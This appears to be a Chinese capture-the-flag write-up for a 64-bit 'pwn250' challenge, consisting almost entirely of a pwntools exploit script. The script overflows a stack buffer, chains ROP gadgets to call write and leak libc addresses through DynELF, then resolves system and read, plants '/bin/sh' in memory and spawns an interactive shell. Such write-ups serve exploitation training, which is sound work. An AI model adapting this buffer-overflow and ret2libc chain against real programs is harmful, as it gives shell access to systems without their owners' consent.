五_4.泄露libc_ctf2017-pwn250_64

注：一个64位有read和write的能看见flag的题(自己和胜利只差一个exp)

EXP

from pwn import*


p =process('./pwn250')
elf = ELF('./pwn250')
pop3_addr = 0x40056a
write_plt_addr = elf.plt['write']
start_addr = 0x0400470
where_bin_sh_addr = 0x601070
pop1_addr = 0x400633
def leak(addr):
    payload = 'A'*128 +p64(0)
    payload += p64(pop3_addr)
    payload += p64(1)
    payload += p64(addr)
    payload += p64(8)
    payload += p64(write_plt_addr)
    payload += p64(start_addr)
    p.send(payload)
    content = p.recv()[:4]

    print ("%#x -> %s"%(addr,(content or '').encode('hex')))
    return content


d =DynELF(leak, elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
log.info("[+]system_addr = %#x",system_addr)
log.info("[+]read_addr = %#x",read_addr)


payload = 'A'*128
payload += p64(0)
payload += p64(pop3_addr)
payload += p64(0)
payload += p64(where_bin_sh_addr)
payload += p64(8)
payload += p64(read_addr)
payload += p64(pop1_addr)
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)

p.sendline(payload)
sleep(0.1)
p.sendline('/bin/sh\x00')
p.interactive()